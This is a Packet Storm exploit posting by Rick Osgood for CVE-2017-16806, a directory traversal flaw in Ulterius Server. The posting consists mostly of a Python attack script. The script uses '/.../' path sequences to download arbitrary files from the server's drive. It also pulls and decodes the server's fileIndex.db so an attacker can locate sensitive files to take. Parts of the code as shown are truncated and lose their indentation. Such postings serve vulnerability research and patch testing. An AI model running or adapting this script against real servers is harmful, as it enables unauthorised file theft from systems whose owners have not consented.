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packetstormRick OsgoodPACKETSTORM:144994
HistoryNov 15, 2017 - 12:00 a.m.

Ulterius Server Directory Traversal

Rick Osgood

0.071 Low




`# Exploit Title: Ulterius Server < Directory Traversal Arbitrary File Access  
# Date: 11/13/2017  
# Exploit Author: Rick Osgood  
# Vendor Homepage:  
# Software Link:  
# Version: <  
# Tested on: Windows Server 2012 R2  
# CVE : CVE-2017-16806  
# You can download almost any file that resides on the same drive letter as Ulterius server.  
# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini  
# Unfortunately, you need to know the path to the file you want to download.  
# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:  
# http://ulteriusURL:2206/.../fileIndex.db  
# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to  
# make it human readable. Then you can use the same script to download any juicy files you find.  
# Ulterius writes the following to the fileIndex.db file:  
# First four bytes are a timestamp so we can ignore this  
# The next four items repeat until the end of the file:  
# filename.length (4 bytes?)  
# filename  
# directory.length (4 bytes?)  
# directory  
import requests  
import sys  
import argparse  
import zlib  
import struct  
# This function grabs the filename or file path from the fileIndex  
def processChunk(i, data):  
length = struct.unpack('B', data[i])[0]  
length += struct.unpack('B', data[i+1])[0]  
length += struct.unpack('B', data[i+2])[0]  
length += struct.unpack('B', data[i+3])[0]  
i += 4  
filename = data[i:i+length]  
i += length  
return i, filename  
# Main function  
def main():  
# Parse arguments  
parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')  
parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')  
parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')  
parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')  
args = parser.parse_args()  
# We are going to retrieve a specified file  
if args.retrieve:  
fileName = str(args.retrieve[0])  
# This works for the default Ulterius install directory.  
baseDir = "/.../.../.../.../.../.../.../.../.../"  
# Remove slashes from output file name  
outFile = fileName.replace('\\','_')  
# Remove drive letter and change slashes  
if ":\\" in fileName[:3]:  
fileName = fileName[3:]  
# Replace slashes  
fileName = fileName.replace('\\','/') # Replace slashes  
# Build URL  
url = str(args.url[0]) + baseDir + fileName  
print "Retrieving " + url  
# Download file  
r = requests.get(url=url, stream=True) # Retrieve file  
# Write file  
f = open(outFile, 'w')  
# We are going to download the fileIndex.db file  
if args.index:  
# Setup the URL  
url = args.url[0] + "/.../fileIndex.db"  
print "Downloading " + url  
# Download file  
r = requests.get(url=url, stream=True)  
# decompress the data  
data = zlib.decompress( r.content, -15 )  
# Open output file for writing  
f = open('fileIndex.db', 'w')  
# Strip off header info (not sure what this is)  
data = data[8:]  
# Process file names and write to output file  
i = 0  
while i < len(data):   
i, filename = processChunk(i, data) # Get file name  
i, directory = processChunk(i, data) # Get file path  
i += 8 # Skip the FFFFFFFFFFFFFFFF  
f.write(directory + '\\' + filename + '\n') # Write to output file  
if __name__ == "__main__":  

0.071 Low


